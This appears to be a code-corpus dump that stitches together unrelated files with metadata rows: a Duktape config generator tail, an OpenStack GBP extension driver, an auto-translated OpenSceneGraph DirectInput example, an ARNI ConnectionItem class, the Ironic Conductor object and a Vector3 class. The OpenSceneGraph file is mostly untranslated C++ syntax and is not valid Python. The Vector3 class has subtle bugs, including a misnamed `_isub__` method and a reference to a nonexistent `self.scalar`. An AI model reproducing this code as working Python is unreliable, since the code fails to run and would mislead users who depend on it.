logger.info('Creating duk_config.h: ' + ', '.join(desc))
result, active_opts = generate_duk_config_header(opts, meta_dir)
with open(opts.output, 'wb') as f:
f.write(result)
logger.debug('Wrote duk_config.h to ' + str(opts.output))
if opts.output_active_options is not None:
with open(opts.output_active_options, 'wb') as f:
f.write(json.dumps(active_opts, indent=4))
logger.debug('Wrote active options JSON metadata to ' + str(opts.output_active_options))
elif cmd == 'feature-documentation':
raise Exception('The feature-documentation command has been removed along with DUK_OPT_xxx feature option support')
elif cmd == 'config-documentation':
logger.info('Creating config option documentation')
result = generate_config_option_documentation(opts)
with open(opts.output, 'wb') as f:
f.write(result)
logger.debug('Wrote config option documentation to ' + str(opts.output))
else:
raise Exception('invalid command: %r' % cmd)
def main():
opts, args = parse_options()
genconfig(opts, args)
if __name__ == '__main__':
main()
|
mit
| -6,401,203,405,470,451,000 | 37.105511 | 313 | 0.606021 | false | 3.743382 | true | false | false |
noironetworks/group-based-policy
|
gbpservice/neutron/services/grouppolicy/drivers/extensions/aim_mapping_extension_driver.py
|
1
|
4344
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from neutron_lib.plugins import directory
from oslo_log import log as logging
import sqlalchemy as sa
from sqlalchemy.ext import baked
from gbpservice.neutron.db.grouppolicy.extensions import (
apic_auto_ptg_db as auto_ptg_db)
from gbpservice.neutron.db.grouppolicy.extensions import (
apic_intra_ptg_db as intra_ptg_db)
from gbpservice.neutron.db.grouppolicy import group_policy_db as gp_db
from gbpservice.neutron.extensions import cisco_apic_gbp
from gbpservice.neutron.extensions import group_policy as gpolicy
from gbpservice.neutron.services.grouppolicy import (
group_policy_driver_api as api)
LOG = logging.getLogger(__name__)
BAKERY = baked.bakery(_size_alert=lambda c: LOG.warning(
"sqlalchemy baked query cache size exceeded in %s", __name__))
class AIMExtensionDriver(api.ExtensionDriver,
intra_ptg_db.ApicIntraPtgDBMixin,
auto_ptg_db.ApicAutoPtgDBMixin):
_supported_extension_alias = cisco_apic_gbp.ALIAS
_extension_dict = cisco_apic_gbp.EXTENDED_ATTRIBUTES_2_0
def __init__(self):
LOG.info("AIM Extension __init__")
self._policy_driver = None
@property
def _pd(self):
if not self._policy_driver:
gbp_plugin = directory.get_plugin("GROUP_POLICY")
policy_mgr = gbp_plugin.policy_driver_manager
self._policy_driver = policy_mgr.policy_drivers['aim_mapping'].obj
return self._policy_driver
def initialize(self):
pass
@property
def extension_alias(self):
return self._supported_extension_alias
def _set_intra_ptg_allow(self, session, data, result):
ptg = data['policy_target_group']
query = BAKERY(lambda s: s.query(
gp_db.PolicyTargetGroup))
query += lambda q: q.filter_by(
id=sa.bindparam('id'))
ptg_db = query(session).params(
id=result['id']).one()
if not ptg_db:
raise gpolicy.PolicyTargetGroupNotFound(
policy_target_group_id=result['id'])
if 'intra_ptg_allow' in ptg:
self.set_intra_ptg_allow(
session, policy_target_group_id=result['id'],
intra_ptg_allow=ptg['intra_ptg_allow'])
result['intra_ptg_allow'] = ptg['intra_ptg_allow']
else:
self._extend_ptg_dict_with_intra_ptg_allow(session, result)
def _extend_ptg_dict_with_intra_ptg_allow(self, session, result):
result['intra_ptg_allow'] = self.get_intra_ptg_allow(
session, policy_target_group_id=result['id'])
def process_create_policy_target_group(self, session, data, result):
self._set_intra_ptg_allow(session, data, result)
result['is_auto_ptg'] = bool(
gpolicy.AUTO_PTG_REGEX.match(result['id']))
self.set_is_auto_ptg(
session, policy_target_group_id=result['id'],
is_auto_ptg=result['is_auto_ptg'])
def process_update_policy_target_group(self, session, data, result):
self._set_intra_ptg_allow(session, data, result)
def extend_policy_target_group_dict(self, session, result):
self._extend_ptg_dict_with_intra_ptg_allow(session, result)
result['is_auto_ptg'] = self.get_is_auto_ptg(
session, policy_target_group_id=result['id'])
self._pd.extend_policy_target_group_dict(session, result)
def extend_application_policy_group_dict(self, session, result):
self._pd.extend_application_policy_group_dict(session, result)
def extend_policy_rule_dict(self, session, result):
self._pd.extend_policy_rule_dict(session, result)
def extend_policy_rule_set_dict(self, session, result):
self._pd.extend_policy_rule_set_dict(session, result)
|
apache-2.0
| -5,990,733,584,893,358,000 | 39.222222 | 78 | 0.662063 | false | 3.472422 | false | false | false |
JaneliaSciComp/osgpyplusplus
|
examples/rough_translated1/osgdirectinput.py
|
1
|
10576
|
#!/bin/env python
# Automatically translated python version of
# OpenSceneGraph example program "osgdirectinput"
# !!! This program will need manual tuning before it will work. !!!
import sys
from osgpypp import osgDB
from osgpypp import osgGA
from osgpypp import osgViewer
# Translated from file 'DirectInputRegistry.cpp'
# OpenSceneGraph example, osgdirectinput.
#*
#* Permission is hereby granted, free of charge, to any person obtaining a copy
#* of this software and associated documentation files (the "Software"), to deal
#* in the Software without restriction, including without limitation the rights
#* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
#* copies of the Software, and to permit persons to whom the Software is
#* furnished to do so, subject to the following conditions:
#*
#* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
#* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
#* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
#* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
#* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
#* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
#* THE SOFTWARE.
#
#include <osgGA/EventQueue>
#include <iostream>
#include "DirectInputRegistry"
typedef std.pair<int, int> KeyValue
typedef std.map<int, KeyValue> KeyMap
g_keyMap = KeyMap()
def buildKeyMap():
# TODO: finish the key map as you wish
g_keyMap[DIK_ESCAPE] = KeyValue(osgGA.GUIEventAdapter.KEY_Escape, 0)
g_keyMap[DIK_1] = KeyValue(ord("1"), 0)
g_keyMap[DIK_2] = KeyValue(ord("2"), 0)
g_keyMap[DIK_3] = KeyValue(ord("3"), 0)
g_keyMap[DIK_4] = KeyValue(ord("4"), 0)
g_keyMap[DIK_5] = KeyValue(ord("5"), 0)
g_keyMap[DIK_6] = KeyValue(ord("6"), 0)
g_keyMap[DIK_7] = KeyValue(ord("7"), 0)
g_keyMap[DIK_8] = KeyValue(ord("8"), 0)
g_keyMap[DIK_9] = KeyValue(ord("9"), 0)
g_keyMap[DIK_0] = KeyValue(ord("0"), 0)
g_keyMap[DIK_MINUS] = KeyValue(ord("-"), 0)
g_keyMap[DIK_EQUALS] = KeyValue(ord("="), 0)
g_keyMap[DIK_BACK] = KeyValue(osgGA.GUIEventAdapter.KEY_BackSpace, 0)
g_keyMap[DIK_TAB] = KeyValue(osgGA.GUIEventAdapter.KEY_Tab, 0)
g_keyMap[DIK_SPACE] = KeyValue(osgGA.GUIEventAdapter.KEY_Space, 0)
bool DirectInputRegistry.initKeyboard( HWND handle )
if not _inputDevice : return False
hr = _inputDevice.CreateDevice( GUID_SysKeyboard, _keyboard, NULL )
if FAILED(hr) or _keyboard==NULL :
osg.notify(osg.WARN), "Unable to create keyboard."
return False
buildKeyMap()
initImplementation = return( handle, _keyboard, c_dfDIKeyboard )
bool DirectInputRegistry.initMouse( HWND handle )
if not _inputDevice : return False
hr = _inputDevice.CreateDevice( GUID_SysMouse, _mouse, NULL )
if FAILED(hr) or _mouse==NULL :
osg.notify(osg.WARN), "Unable to create mouse."
return False
initImplementation = return( handle, _mouse, c_dfDIMouse2 )
bool DirectInputRegistry.initJoystick( HWND handle )
if not _inputDevice : return False
hr = _inputDevice.EnumDevices( DI8DEVCLASS_GAMECTRL, EnumJoysticksCallback,
NULL, DIEDFL_ATTACHEDONLY )
if FAILED(hr) or _joystick==NULL :
osg.notify(osg.WARN), "Unable to enumerate joysticks."
return False
initImplementation = return( handle, _joystick, c_dfDIJoystick2 )
void DirectInputRegistry.updateState( osgGA.EventQueue* eventQueue )
hr = HRESULT()
if not _supportDirectInput or not eventQueue : return
if _keyboard :
pollDevice( _keyboard )
char buffer[256] = 0
hr = _keyboard.GetDeviceState( sizeof(buffer), buffer )
if SUCCEEDED(hr) :
for ( KeyMap.iterator itr=g_keyMap.begin() itr not =g_keyMap.end() ++itr )
key = itr.second
value = buffer[itr.first]
if key.second==value : continue
key.second = value
if value0x80 :
eventQueue.keyPress( key.first )
else:
eventQueue.keyRelease( key.first )
if _mouse :
pollDevice( _mouse )
mouseState = DIMOUSESTATE2()
hr = _mouse.GetDeviceState( sizeof(DIMOUSESTATE2), mouseState )
# TODO: add mouse handlers
if _joystick :
pollDevice( _joystick )
event = JoystickEvent()
hr = _joystick.GetDeviceState( sizeof(DIJOYSTATE2), (event._js) )
if SUCCEEDED(hr) : eventQueue.userEvent( event )
DirectInputRegistry.DirectInputRegistry()
: _keyboard(0), _mouse(0), _joystick(0),
_supportDirectInput(True)
hr = DirectInput8Create( GetModuleHandle(NULL), DIRECTINPUT_VERSION,
IID_IDirectInput8, (VOID**)_inputDevice, NULL )
if FAILED(hr) :
osg.notify(osg.WARN), "Unable to create DirectInput object."
_supportDirectInput = False
DirectInputRegistry.~DirectInputRegistry()
releaseDevice( _keyboard )
releaseDevice( _mouse )
releaseDevice( _joystick )
if _inputDevice : _inputDevice.Release()
bool DirectInputRegistry.initImplementation( HWND handle, LPDIRECTINPUTDEVICE8 device, LPCDIDATAFORMAT format )
_supportDirectInput = True
hr = device.SetDataFormat( format )
if FAILED(hr) :
osg.notify(osg.WARN), "Unable to set device data format."
_supportDirectInput = False
hr = device.SetCooperativeLevel( handle, DISCL_EXCLUSIVE|DISCL_FOREGROUND )
if FAILED(hr) :
osg.notify(osg.WARN), "Unable to attach device to window."
_supportDirectInput = False
device.Acquire()
return _supportDirectInput
void DirectInputRegistry.pollDevice( LPDIRECTINPUTDEVICE8 device )
hr = device.Poll()
if FAILED(hr) :
device.Acquire()
if hr==DIERR_INPUTLOST :
osg.notify(osg.WARN), "Device lost."
void DirectInputRegistry.releaseDevice( LPDIRECTINPUTDEVICE8 device )
if device :
device.Unacquire()
device.Release()
BOOL CALLBACK DirectInputRegistry.EnumJoysticksCallback( DIDEVICEINSTANCE* didInstance, VOID* )
hr = HRESULT()
device = DirectInputRegistry.instance().getDevice()
if device :
hr = device.CreateDevice( didInstance.guidInstance,
(DirectInputRegistry.instance().getJoyStick()), NULL )
if FAILED(hr) : return DIENUM_CONTINUE
return DIENUM_STOP
# Translated from file 'osgdirectinput.cpp'
# OpenSceneGraph example, osgdirectinput.
#*
#* Permission is hereby granted, free of charge, to any person obtaining a copy
#* of this software and associated documentation files (the "Software"), to deal
#* in the Software without restriction, including without limitation the rights
#* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
#* copies of the Software, and to permit persons to whom the Software is
#* furnished to do so, subject to the following conditions:
#*
#* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
#* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
#* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
#* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
#* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
#* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
#* THE SOFTWARE.
#
#include <osgDB/ReadFile>
#include <osgGA/StateSetManipulator>
#include <osgViewer/api/Win32/GraphicsWindowWin32>
#include <osgViewer/Viewer>
#include <osgViewer/ViewerEventHandlers>
#include <iostream>
#include "DirectInputRegistry"
class CustomViewer (osgViewer.Viewer) :
CustomViewer() : osgViewer.Viewer()
virtual ~CustomViewer()
def eventTraversal():
DirectInputRegistry.instance().updateState( _eventQueue )
osgViewer.Viewer.eventTraversal()
def viewerInit():
windowWin32 = dynamic_cast<osgViewer.GraphicsWindowWin32*>( _camera.getGraphicsContext() )
if windowWin32 :
hwnd = windowWin32.getHWND()
DirectInputRegistry.instance().initKeyboard( hwnd )
#DirectInputRegistry.instance().initMouse( hwnd )
DirectInputRegistry.instance().initJoystick( hwnd )
osgViewer.Viewer.viewerInit()
class JoystickHandler (osgGA.GUIEventHandler) :
JoystickHandler()
def handle(ea, aa):
switch ( ea.getEventType() )
case osgGA.GUIEventAdapter.KEYDOWN:
print "*** Key 0x", std.hex, ea.getKey(), std.dec, " down ***"
break
case osgGA.GUIEventAdapter.KEYUP:
print "*** Key 0x", std.hex, ea.getKey(), std.dec, " up ***"
break
case osgGA.GUIEventAdapter.USER:
event = dynamic_cast< JoystickEvent*>( ea.getUserData() )
if not event : break
js = event._js
for ( unsigned int i=0 i<128 ++i )
if js.rgbButtons[i] :
print "*** Joystick Btn", i, " = ", (int)js.rgbButtons[i]
if js.lX==0x0000 : print "*** Joystick X-"
elif js.lX==0xffff : print "*** Joystick X+"
if js.lY==0 : print "*** Joystick Y-"
elif js.lY==0xffff : print "*** Joystick Y+"
return True
default:
break
return False
def main(argv):
arguments = osg.ArgumentParser( argc, argv )
model = osgDB.readNodeFiles( arguments )
if not model : model = osgDB.readNodeFile( "cow.osgt" )
if not model :
print arguments.getApplicationName(), ": No data loaded"
return 1
viewer = CustomViewer()
viewer.addEventHandler( JoystickHandler )()
viewer.addEventHandler( osgViewer.StatsHandler )()
viewer.addEventHandler( osgViewer.WindowSizeHandler )()
viewer.addEventHandler( osgGA.StateSetManipulator(viewer.getCamera().getOrCreateStateSet()) )
viewer.setSceneData( model )
viewer.setUpViewInWindow( 250, 50, 800, 600 )
return viewer.run()
if __name__ == "__main__":
main(sys.argv)
|
bsd-3-clause
| 779,081,873,386,174,500 | 36.637011 | 111 | 0.647315 | false | 3.66205 | false | false | false |
ROS-PSE/arni
|
arni_gui/src/arni_gui/connection_item.py
|
1
|
7933
|
import genpy
from rospy.rostime import Time, Duration
from python_qt_binding.QtCore import QTranslator
from abstract_item import AbstractItem
from helper_functions import prepare_number_for_representation, MAXIMUM_OFFLINE_TIME, ROUND_DIGITS
class ConnectionItem(AbstractItem):
"""
A ConnectionItem reresents the connection between a publisher and a subscriber and the topic they are publishing / listening on
"""
def __init__(self, logger, seuid, first_message, parent=None):
"""
Initializes the ConnectionItem.
:param seuid: the seuid of the item
:type seuid: str
:param logger: a logger where to log when special events occur
:type logger: ModelLogger
:param type: the type of the item
:type type: str
:param parent: the parent-item
:type parent: AbstractItem
"""
AbstractItem.__init__(self, logger, seuid, parent)
self.__parent = parent
self._type = "connection"
self.add_keys=["dropped_msgs", "traffic"]
self.avg_keys=["period_mean", "period_stddev", "stamp_age_mean", "stamp_age_stddev", "bandwidth", "frequency"]
self.max_keys=["period_max", "stamp_age_max"]
self._attributes = []
self._attributes.extend(["dropped_msgs", "traffic",
"period_mean", "period_stddev", "period_max", "stamp_age_mean",
"stamp_age_stddev", "stamp_age_max", "bandwidth", "frequency"])
for item in self._attributes:
self._add_data_list(item)
for item in self._attributes:
self._rated_attributes.append(item + ".actual_value")
self._rated_attributes.append(item + ".expected_value")
self._rated_attributes.append(item + ".state")
for item in self._rated_attributes:
self._add_rated_data_list(item)
self._logger.log("info", Time.now(), seuid, "Created a new ConnectionItem")
self.show_as_subscriber = False
self.tree_item1 = None
self.tree_item2 = None
def aggregate_data(self, period):
"""
:param period: The amount in seconds over which the data should be aggregated.
:return:
"""
values = {}
for key in self._attributes:
values[key] = 0
entries = self.get_items_younger_than(Time.now() - (Duration(secs=period) if int(Duration(secs=period).to_sec()) <= int(Time.now().to_sec()) else Time(0) ))
length = len(entries["window_stop"]) if entries["window_stop"] else 0
if length > 0:
for key in self.add_keys:
for i in range(0, length):
values[key] += entries[key][i]
for key in self.max_keys:
if type(entries[key][-1]) == genpy.rostime.Time or type(entries[key][-1]) == genpy.rostime.Duration:
for i in range(0, length):
if entries[key][i].to_sec() > values[key]:
values[key] = entries[key][i].to_sec()
else:
for i in range(0, length):
if entries[key][i] > values[key]:
values[key] = entries[key][i]
for key in self.avg_keys:
if type(entries[key][0]) is genpy.rostime.Time or type(entries[key][0]) is genpy.rostime.Duration:
for i in range(0, length):
values[key] += entries[key][i].to_sec()
else:
for i in range(0, length):
values[key] += entries[key][i]
values[key] = values[key] / length
return values
def execute_action(self, action):
"""
Not senseful, Connection cannot execute actions.
:param action: action to be executed
:type action: RemoteAction
"""
pass
def get_detailed_data(self):
"""
Returns the detailed data of the ConnectionItem.
:returns: str
"""
data_dict = self.get_latest_data()
if Time.now() - data_dict["window_stop"] > Duration(secs=5):
return "No recent data"
content = "<p class=\"detailed_data\">"
content += self.get_erroneous_entries()
if "frequency" in self._attributes:
content += self.tr("frequency") + ": " + prepare_number_for_representation(data_dict["frequency"]) \
+ " " + self.tr("frequency_unit") + " <br>"
content += self.tr("dropped_msgs") + ": " + prepare_number_for_representation(data_dict["dropped_msgs"]) + " " \
+ self.tr("dropped_msgs_unit") + " <br>"
content += self.tr("bandwidth") + ": " + prepare_number_for_representation(data_dict["bandwidth"]) + " " \
+ " " + self.tr("bandwidth_unit") + " <br>"
content += self.tr("period_mean") + ": " + prepare_number_for_representation(data_dict["period_mean"]) \
+ " " + self.tr("period_mean_unit") + " <br>"
content += self.tr("period_stddev") + ": " + prepare_number_for_representation(data_dict["period_stddev"]) \
+ " " + self.tr("period_stddev_unit") + " <br>"
content += self.tr("period_max") + ": " + prepare_number_for_representation(data_dict["period_max"]) + " " \
+ self.tr("period_max_unit") + " <br>"
content += self.tr("stamp_age_mean") + ": " + prepare_number_for_representation(data_dict["stamp_age_mean"]) \
+ " " + self.tr("stamp_age_mean_unit") + " <br>"
content += self.tr("stamp_age_stddev") + ": " + prepare_number_for_representation(data_dict["stamp_age_stddev"]) \
+ " " + self.tr("stamp_age_stddev_unit") + " <br>"
content += self.tr("stamp_age_max") + ": " + prepare_number_for_representation(data_dict["stamp_age_max"]) \
+ " " + self.tr("stamp_age_max_unit") + " <br>"
content += "</p>"
return content
def get_plotable_items(self):
"""
Returns items for the plot.
:returns: str[]
"""
return ["dropped_msgs", "bandwidth", "frequency", "period_mean", "period_stddev", "period_max", "stamp_age_mean",
"stamp_age_stddev", "stamp_age_max"]
def get_short_data(self):
"""
Returns a shortend version of the item data.
:returns: data of the item
:rtype: str
"""
data_dict = self.get_latest_data()
if data_dict["window_stop"] == Time(0):
return "No data yet"
elif (Time.now() - data_dict["window_stop"]) > Duration(MAXIMUM_OFFLINE_TIME):
# last entry was more than MAXIMUM_OFFLINE_TIME ago, it could be offline!
return "No data since " + prepare_number_for_representation(Time.now() - data_dict["window_stop"]) \
+ " seconds"
content = ""
if data_dict["state"] is "error":
content += self.get_erroneous_entries_for_log()
else:
content += self.tr("frequency") + ": " + prepare_number_for_representation(data_dict["frequency"]) \
+ " " + self.tr("frequency_unit") + " - "
content += self.tr("bandwidth") + ": " + prepare_number_for_representation(
data_dict["bandwidth"]) + " " \
+ self.tr("bandwidth_unit") + " - "
content += self.tr("dropped_msgs") + ": " + prepare_number_for_representation(data_dict["dropped_msgs"]) \
+ " " + self.tr("dropped_msgs_unit")
return content
def get_list_items(self):
return []
def get_time_items(self):
return ["period_mean", "period_stddev", "period_max", "stamp_age_mean",
"stamp_age_stddev", "stamp_age_max"]
|
bsd-2-clause
| 8,285,537,754,295,539,000 | 40.103627 | 164 | 0.541787 | false | 3.904035 | false | false | false |
pshchelo/ironic
|
ironic/objects/conductor.py
|
1
|
6820
|
# coding=utf-8
#
# Copyright 2013 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_versionedobjects import base as object_base
from ironic.common.i18n import _
from ironic.db import api as db_api
from ironic.objects import base
from ironic.objects import fields as object_fields
@base.IronicObjectRegistry.register
class Conductor(base.IronicObject, object_base.VersionedObjectDictCompat):
# Version 1.0: Initial version
# Version 1.1: Add register() and unregister(), make the context parameter
# to touch() optional.
# Version 1.2: Add register_hardware_interfaces() and
# unregister_all_hardware_interfaces()
VERSION = '1.2'
dbapi = db_api.get_instance()
fields = {
'id': object_fields.IntegerField(),
'drivers': object_fields.ListOfStringsField(nullable=True),
'hostname': object_fields.StringField(),
}
# NOTE(xek): We don't want to enable RPC on this call just yet. Remotable
# methods can be used in the future to replace current explicit RPC calls.
# Implications of calling new remote procedures should be thought through.
# @object_base.remotable_classmethod
@classmethod
def get_by_hostname(cls, context, hostname):
"""Get a Conductor record by its hostname.
:param cls: the :class:`Conductor`
:param context: Security context
:param hostname: the hostname on which a Conductor is running
:returns: a :class:`Conductor` object.
"""
db_obj = cls.dbapi.get_conductor(hostname)
conductor = cls._from_db_object(context, cls(), db_obj)
return conductor
def save(self, context):
"""Save is not supported by Conductor objects."""
raise NotImplementedError(
_('Cannot update a conductor record directly.'))
# NOTE(xek): We don't want to enable RPC on this call just yet. Remotable
# methods can be used in the future to replace current explicit RPC calls.
# Implications of calling new remote procedures should be thought through.
# @object_base.remotable
def refresh(self, context=None):
"""Loads and applies updates for this Conductor.
Loads a :class:`Conductor` with the same uuid from the database and
checks for updated attributes. Updates are applied from
the loaded chassis column by column, if there are any updates.
:param context: Security context. NOTE: This should only
be used internally by the indirection_api.
Unfortunately, RPC requires context as the first
argument, even though we don't use it.
A context should be set when instantiating the
object, e.g.: Conductor(context)
"""
current = self.get_by_hostname(self._context, hostname=self.hostname)
self.obj_refresh(current)
# NOTE(xek): We don't want to enable RPC on this call just yet. Remotable
# methods can be used in the future to replace current explicit RPC calls.
# Implications of calling new remote procedures should be thought through.
# @object_base.remotable
def touch(self, context=None):
"""Touch this conductor's DB record, marking it as up-to-date."""
self.dbapi.touch_conductor(self.hostname)
# NOTE(xek): We don't want to enable RPC on this call just yet. Remotable
# methods can be used in the future to replace current explicit RPC calls.
# Implications of calling new remote procedures should be thought through.
# @object_base.remotable
@classmethod
def register(cls, context, hostname, drivers, update_existing=False):
"""Register an active conductor with the cluster.
:param cls: the :class:`Conductor`
:param context: Security context
:param hostname: the hostname on which the conductor will run
:param drivers: the list of drivers enabled in the conductor
:param update_existing: When false, registration will raise an
exception when a conflicting online record
is found. When true, will overwrite the
existing record. Default: False.
:raises: ConductorAlreadyRegistered
:returns: a :class:`Conductor` object.
"""
db_cond = cls.dbapi.register_conductor(
{'hostname': hostname,
'drivers': drivers,
'version': cls.get_target_version()},
update_existing=update_existing)
return cls._from_db_object(context, cls(), db_cond)
# NOTE(xek): We don't want to enable RPC on this call just yet. Remotable
# methods can be used in the future to replace current explicit RPC calls.
# Implications of calling new remote procedures should be thought through.
# @object_base.remotable
def unregister(self, context=None):
"""Remove this conductor from the service registry."""
self.unregister_all_hardware_interfaces()
self.dbapi.unregister_conductor(self.hostname)
def register_hardware_interfaces(self, hardware_type, interface_type,
interfaces, default_interface):
"""Register hardware interfaces with the conductor.
:param hardware_type: Name of hardware type for the interfaces.
:param interface_type: Type of interfaces, e.g. 'deploy' or 'boot'.
:param interfaces: List of interface names to register.
:param default_interface: String, the default interface for this
hardware type and interface type.
"""
self.dbapi.register_conductor_hardware_interfaces(self.id,
hardware_type,
interface_type,
interfaces,
default_interface)
def unregister_all_hardware_interfaces(self):
"""Unregister all hardware interfaces for this conductor."""
self.dbapi.unregister_conductor_hardware_interfaces(self.id)
|
apache-2.0
| -1,894,912,130,061,540,000 | 45.394558 | 78 | 0.643548 | false | 4.601889 | false | false | false |
astrofra/demo-unusual-suspects
|
Python-toolchain/3D/vector3.py
|
1
|
17953
|
from math import *
from util import format_number
class Vector3(object):
__slots__ = ('_v',)
def __init__(self, *args):
"""Creates a Vector3 from 3 numeric values or a list-like object
containing at least 3 values. No arguments result in a null vector.
"""
if len(args) == 3:
self._v = map(float, args[:3])
return
if not args:
self._v = [0., 0., 0.]
elif len(args) == 1:
self._v = map(float, args[0][:3])
else:
raise ValueError("Vector3.__init__ takes 0, 1 or 3 parameters")
@classmethod
def from_points(cls, p1, p2):
v = cls.__new__(cls, object)
ax, ay, az = p1
bx, by, bz = p2
v._v = [bx-ax, by-ay, bz-az]
return v
@classmethod
def from_floats(cls, x, y, z):
"""Creates a Vector3 from individual float values.
Warning: There is no checking for efficiency here: x, y, z _must_ be
floats.
"""
v = cls.__new__(cls, object)
v._v = [x, y, z]
return v
@classmethod
def from_iter(cls, iterable):
"""Creates a Vector3 from an iterable containing at least 3 values."""
it = iter(iterable)
next = it.next
v = cls.__new__(cls, object)
v._v = [ float(next()), float(next()), float(next()) ]
return v
def copy(self):
"""Returns a copy of this vector."""
v = self.__new__(self.__class__, object)
v._v = self._v[:]
return v
#return self.from_floats(self._v[0], self._v[1], self._v[2])
__copy__ = copy
def _get_x(self):
return self._v[0]
def _set_x(self, x):
assert isinstance(x, float), "Must be a float"
self._v[0] = x
x = property(_get_x, _set_x, None, "x component.")
def _get_y(self):
return self._v[1]
def _set_y(self, y):
assert isinstance(y, float), "Must be a float"
self._v[1] = y
y = property(_get_y, _set_y, None, "y component.")
def _get_z(self):
return self._v[2]
def _set_z(self, z):
assert isinstance(z, float), "Must be a float"
self._v[2] = z
z = property(_get_z, _set_z, None, "z component.")
def _get_length(self):
x, y, z = self._v
return sqrt(x*x + y*y +z*z)
def _set_length(self, length):
v = self._v
try:
x, y, z = v
l = length / sqrt(x*x + y*y +z*z)
except ZeroDivisionError:
v[0] = 0.
v[1] = 0.
v[2] = 0.
return self
v[0] = x*l
v[1] = y*l
v[2] = z*l
length = property(_get_length, _set_length, None, "Length of the vector")
def unit(self):
"""Returns a unit vector."""
x, y, z = self._v
l = sqrt(x*x + y*y + z*z)
return self.from_floats(x/l, y/l, z/l)
def set(self, x, y, z):
"""Sets the components of this vector.
x -- x component
y -- y component
z -- z component
"""
assert ( isinstance(x, float) and
isinstance(y, float) and
isinstance(z, float) ), "x, y, z must be floats"
v = self._v
v[0] = x
v[1] = y
v[2] = z
return self
def __str__(self):
x, y, z = self._v
return "(%s, %s, %s)" % (format_number(x),
format_number(y),
format_number(z))
def __repr__(self):
x, y, z = self._v
return "Vector3(%s, %s, %s)" % (x, y, z)
def __len__(self):
return 3
def __iter__(self):
"""Iterates the components in x, y, z order."""
return iter(self._v[:])
def __getitem__(self, index):
"""Retrieves a component, given its index.
index -- 0, 1 or 2 for x, y or z
"""
try:
return self._v[index]
except IndexError:
raise IndexError, "There are 3 values in this object, index should be 0, 1 or 2!"
def __setitem__(self, index, value):
"""Sets a component, given its index.
index -- 0, 1 or 2 for x, y or z
value -- New (float) value of component
"""
assert isinstance(value, float), "Must be a float"
try:
self._v[index] = value
except IndexError:
raise IndexError, "There are 3 values in this object, index should be 0, 1 or 2!"
def __eq__(self, rhs):
"""Test for equality
rhs -- Vector or sequence of 3 values
"""
x, y, z = self._v
xx, yy, zz = rhs
return x==xx and y==yy and z==zz
def __ne__(self, rhs):
"""Test of inequality
rhs -- Vector or sequenece of 3 values
"""
x, y, z = self._v
xx, yy, zz = rhs
return x!=xx or y!=yy or z!=zz
def __hash__(self):
return hash(tuple(self._v))
def __add__(self, rhs):
"""Returns the result of adding a vector (or collection of 3 numbers)
from this vector.
rhs -- Vector or sequence of 2 values
"""
x, y, z = self._v
ox, oy, oz = rhs
return self.from_floats(x+ox, y+oy, z+oz)
def __iadd__(self, rhs):
"""Adds another vector (or a collection of 3 numbers) to this vector.
rhs -- Vector or sequence of 2 values
"""
ox, oy, oz = rhs
v = self._v
v[0] += ox
v[1] += oy
v[2] += oz
return self
def __radd__(self, lhs):
"""Adds vector to this vector (right version)
lhs -- Left hand side vector or sequence
"""
x, y, z = self._v
ox, oy, oz = lhs
return self.from_floats(x+ox, y+oy, z+oz)
def __sub__(self, rhs):
"""Returns the result of subtracting a vector (or collection of
3 numbers) from this vector.
rhs -- 3 values
"""
x, y, z = self._v
ox, oy, oz = rhs
return self.from_floats(x-ox, y-oy, z-oz)
def _isub__(self, rhs):
"""Subtracts another vector (or a collection of 3 numbers) from this
vector.
rhs -- Vector or sequence of 3 values
"""
ox, oy, oz = rhs
v = self._v
v[0] -= ox
v[1] -= oy
v[2] -= oz
return self
def __rsub__(self, lhs):
"""Subtracts a vector (right version)
lhs -- Left hand side vector or sequence
"""
x, y, z = self._v
ox, oy, oz = lhs
return self.from_floats(ox-x, oy-y, oz-z)
def scalar_mul(self, scalar):
v = self._v
v[0] *= scalar
v[1] *= scalar
v[2] *= scalar
def vector_mul(self, vector):
x, y, z = vector
v= self._v
v[0] *= x
v[1] *= y
v[2] *= z
def get_scalar_mul(self, scalar):
x, y, z = self.scalar
return self.from_floats(x*scalar, y*scalar, z*scalar)
def get_vector_mul(self, vector):
x, y, z = self._v
xx, yy, zz = vector
return self.from_floats(x * xx, y * yy, z * zz)
def __mul__(self, rhs):
"""Return the result of multiplying this vector by another vector, or
a scalar (single number).
rhs -- Vector, sequence or single value.
"""
x, y, z = self._v
if hasattr(rhs, "__getitem__"):
ox, oy, oz = rhs
return self.from_floats(x*ox, y*oy, z*oz)
else:
return self.from_floats(x*rhs, y*rhs, z*rhs)
